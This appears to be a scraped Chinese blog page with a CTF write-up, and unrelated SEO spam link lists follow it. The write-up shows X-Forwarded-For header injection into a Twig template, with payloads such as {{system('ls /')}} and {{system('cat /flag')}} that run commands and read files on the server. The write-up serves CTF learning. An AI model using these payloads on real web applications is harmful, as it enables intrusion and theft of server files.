当前位置: 首页 > news >正文

网站建设方案的摘要怎么写百度学术免费查重入口

网站建设方案的摘要怎么写,百度学术免费查重入口,德阳定制建站网站建设报价,外贸网站建设源码题解 打开环境点击上面的flag可以看到这个IP页面。 抓个包看看有啥东西无,可以看到在返回包有IP。 看到IP就想到X-Forwarded-For这个玩意,我们用X-Forwarded-For随便添加个IP看看。可以看到返回的IP内容变成了123。 X-Forwarded-For:123 推测它会输出我…

题解

打开环境点击上面的flag可以看到这个IP页面。

抓个包看看有啥东西无,可以看到在返回包有IP。

看到IP就想到X-Forwarded-For这个玩意,我们用X-Forwarded-For随便添加个IP看看。可以看到返回的IP内容变成了123。

X-Forwarded-For:123

推测它会输出我们X-Forwarded-For后面的内容,那么这里涉及一个知识点。就是PHP可能存在Twig模版注入漏洞,啥是Twig模板注入呢,简单来说会执行{{}}里面的内容。比如把123改为{{2+6}},那么就会执行里面的内容,IP处返回的是8。

X-Forwarded-For: {{2+6}}

利用这一点我们可以实现代码执行。

X-Forwarded-For: {{system('ls')}}

查看一下根目录,一般flag都是在这里,发现flag确实在这里。

X-Forwarded-For: {{system('ls /')}}

读取flag。

X-Forwarded-For: {{system('cat /flag')}}

总结

主要涉及的知识点是XFF注入,还有Twig模板注入,通过这题又学到2个新的知识点。这个系列的文章主要是记录一些做过的CTF的题目,以此来记录学过的知识点,俗话说好记性不如烂笔头,希望这系列的文章对我有帮助,也对大家有帮助。

http://www.jinmujx.cn/news/113677.html

相关文章:

  • 网站备案名称的影响小说关键词提取软件
  • 网站基础设施建设百度网盘搜索引擎盘多多
  • 网站设计要如何做支付功能百度首页精简版
  • 做家教什么网站网页制作与网站建设实战教程
  • 做企业网站的合同百度平台商家app下载
  • 有哪些可以做威客的网站有哪些李勇seo的博客
  • 一键免费搭建手机网站网站快速排名推广软件
  • 网站开发就业趋势广州网站推广联盟
  • 轻淘客一键做网站谷歌seo需要做什么的
  • 潍坊专业网站建设价格低湖南做网站的公司
  • 公司企业邮箱注册申请福州seo网站排名
  • 福州如何做百度的网站推广快排seo软件
  • 做身份证网站百度广告平台电话
  • 安阳网站制作价格湖南seo优化哪家好
  • 网站建设超链接字体变色代码关键词全网搜索工具
  • 博州住房和城乡建设局网站市场营销策划方案案例
  • 个人博客网站模板素材南宁百度关键词排名公司
  • 张家港建设局网站东莞优化排名公司
  • 高端企业网站建设流程电商引流推广方法
  • c2c网站内容及功能开始google chrome浏览器
  • 湛江网站seo推广海阳seo排名优化培训
  • 网站链接的常见形式品牌推广软文200字
  • 做网站 工资高吗品牌营销策略有哪些
  • 梅州市网站制作太原百度seo排名
  • 选择网站建设公司应该注意什么网站制作公司排名
  • 做网站找哪里百家号关键词排名优化
  • 松江php网站开发培训青岛网站建设公司
  • 政网站首页怎么做试公众号seo排名软件
  • 那个网站可以找人做兼职网站技术解决方案
  • seo关键词外包公司爱站网站长seo综合查询工具